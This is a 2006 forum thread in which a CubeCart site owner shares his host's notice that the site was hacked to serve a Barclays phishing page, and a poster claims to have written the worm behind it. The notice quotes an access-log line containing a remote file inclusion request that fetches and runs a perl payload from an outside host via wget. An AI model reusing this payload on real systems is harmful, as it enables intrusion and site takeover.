Guest Ian MacMillan Posted March 15, 2006 Share Posted March 15, 2006 Got this from my hosting company today, I was using CC3 3.09 at the time, Now up to .10 Dear Ian MacMillan, (Customer ID: 6637673) It has come to our attention that your web space has been hacked and used to setup a phishing site: .ibank.barclays.co.uk/ This folder permissions have been changed to 000 so that you can delete the necessary files in the web space. Please remove this folder and also update any and all scripts and/or applications running within your web space. access.log.09.gz:63.247.77.98 - - [01/Mar/2006:16:47:16 -0500] "GET /includes/orderSuccess.inc.php?cmd=killall%20-9%20perl%3Bwget%20elx.vr0k.com.ar%2Felx.1%2 0-O%20%2Ftmp%2F.i%3Bperl%20%2Ftmp%2F.i%3Brm%20-f%20%2Ftmp%2F.i&glob=1&cart_order_id=1&glob[rootDir]=http%3A%2F%2Felx.vr0k.com.ar%2Fcmd.txt? HTTP/1.1" 200 160 www.rockinghamjunctionmodels.com "-" "-" "-" -- The above was taken from your access logs. It shows that /includes/orderSuccess.inc.php was used to perpetrate the hack. Link to comment Share on other sites More sharing options...
Laico Posted March 15, 2006 Share Posted March 15, 2006 can you post the orderSuccess.inc.php file in the code tags? Link to comment Share on other sites More sharing options...
Guest vr0k Posted July 1, 2006 Share Posted July 1, 2006 lol... my first worm ;) Link to comment Share on other sites More sharing options...
Guest EverythingWeb Posted July 1, 2006 Share Posted July 1, 2006 Pardon me? Link to comment Share on other sites More sharing options...
Guest vr0k Posted July 1, 2006 Share Posted July 1, 2006 I developed an worm that crawl google for vulnerable host to inclusion.btw Ian MacMillan sorry for what happen to ur website, some kid found my script and setup that scam s**t. Link to comment Share on other sites More sharing options...
Guest EverythingWeb Posted July 1, 2006 Share Posted July 1, 2006 Riiight... I dont think we need this discussion here. Thanks, but no thanks. Topic Closed. Link to comment Share on other sites More sharing options...
Recommended Posts